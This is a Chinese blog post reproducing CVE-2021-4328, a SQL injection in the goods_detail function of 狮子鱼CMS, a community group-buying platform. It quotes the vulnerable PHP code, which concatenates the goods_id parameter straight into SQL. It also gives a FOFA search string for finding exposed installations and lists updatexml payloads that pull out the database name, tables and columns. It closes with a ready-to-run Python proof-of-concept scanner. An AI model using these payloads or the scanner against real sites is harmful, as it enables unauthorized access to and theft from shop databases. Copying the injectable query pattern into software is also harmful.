Headline
CVE-2021-4328: 狮子鱼CMS ApiController.class.php SQL注入漏洞复现 - n00bk1ng的小窝
A vulnerability has been found in ???CMS and classified as critical. Affected by this vulnerability is the function goods_detail of the file ApiController.class.php. The manipulation of the argument goods_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-222223.
08/07
狮子鱼
以小程序为载体,快速搭建社区社群社交资源的社区团购平台,帮助商家集中运营管理,轻松管理团长/商品/订单/配备货/售后/财务结算等主要销售场景由快递代收点、社区物业、业主等发起的社区微信群每个群都相当于一个社区店。
fofa搜索
body="/seller.php?s=/Public/login"
产生原因
public function goods_detail()
{
$goods_id = I('get.goods_id');
//gallery =>img_url
//goods goods.goods_desc goods_name group_price market_price sell_count group_number
$sql="select g.*,gd.description,gd.summary,gd.tag from ".
C('DB_PREFIX')."goods g,".C('DB_PREFIX')."goods_description gd where g.goods_id=gd.goods_id and g.goods_id=".$goods_id;
$goods_arr=M()->query($sql);
$qian=array("\r\n");
$hou=array("<br/>");
$goods_arr[0]['summary'] = str_replace($qian,$hou,$goods_arr[0]['summary']);
$sql="select image from ".C('DB_PREFIX')."goods_image where goods_id=".$goods_id;
$goods_image=M()->query($sql);
$gallery = array();
$default_image = '';
foreach($goods_image as $val)
{
$val['img_url'] = str_replace('http','https',C('SITE_URL')).'/Uploads/image/'.$val['image'];
if(empty($default_image))
{
$default_image = str_replace('http','https',C('SITE_URL')).resize($val['image'], C('goods_thumb_width'), C('goods_thumb_height'));
}
$gallery[] = array('img_url' => $val['img_url']);
}
$goods = $goods_arr[0];
路径及参数位置
路径: /index.php?s=api/goods_detail&goods_id=1
漏洞复现
库名:1 and updatexml(0,concat(0x7e,(database())),0)
表名:1 and updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0)
字段名:1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=’库名’ and table_name=’表名’ limit 0,1),0x7e),1)
POC
# -*- coding:utf-8 -*-
import requests
import re
import json
import sys
import urllib3
urllib3.disable_warnings() #忽略https证书告警
vunl_path = "/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)"
def POC(url):
target_url = url + vunl_path
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
}
try:
response = requests.get(url=target_url, headers=headers, verify=False, timeout=10)
print("正在测试:", target_url)
if "syntax" in response.text:
print("上述地址存在SQL注入")
except Exception as e:
print("请求失败!")
sys.exit(0)
if __name__ == '__main__':
print("python3 poc.py http://xx.xx.xx.xx")
addr = str(input("Please input url"))
POC(addr)